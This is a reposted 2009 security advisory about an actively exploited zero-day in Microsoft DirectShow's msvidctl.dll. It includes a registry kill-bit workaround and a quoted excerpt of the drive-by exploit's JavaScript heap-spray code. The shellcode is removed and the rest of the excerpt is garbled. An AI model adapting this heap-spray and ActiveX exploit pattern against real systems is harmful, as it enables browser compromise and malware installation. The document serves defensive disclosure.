Wednesday, July 8, 2009

0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks

Published: 2009-07-06,
Last Updated: 2009-07-07 14:08:53 UTC
by Stephen Hall (Version: 2)

A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites.

Please keep a watchful eye on your AV and IDS/IPS vendors updates to ensure coverage as early as possible on this exploit as it is likely to be widely deployed with the code being available.

A valid work around for the attack vector is available which set's the kill bit on the vulnerable DLL.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

Details of the exploit are available on the CSIS web site, but are included below:


var appllaa='0';

var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;

[SHELL CODE REMOVED]

var headersize=20;

var omybro=unescape(nndx);

var slackspace=headersize+dashell.length;

while(omybro.length<0x30000) shuishimvp="shuishiMVP+shuishiMVP+bZmybr;" memory="new" x="0;x<300;x++)" myobject="document.createElement('object');" width="'1';" height="'1';" data="'./logo.gif';" classid="'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

UPDATE July 6, 2009 19:00 UTC

Microsoft have released an advisory for the exploit, it can be found here :
http://www.microsoft.com/technet/security/advisory/972890.mspx

In addition, they have published a number of blog entries to cover their user base:
http://blogs.technet.com/msrc/default.aspx
http://www.microsoft.com/technet/security/advisory/default.mspx
http://blogs.technet.com/srd/

Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)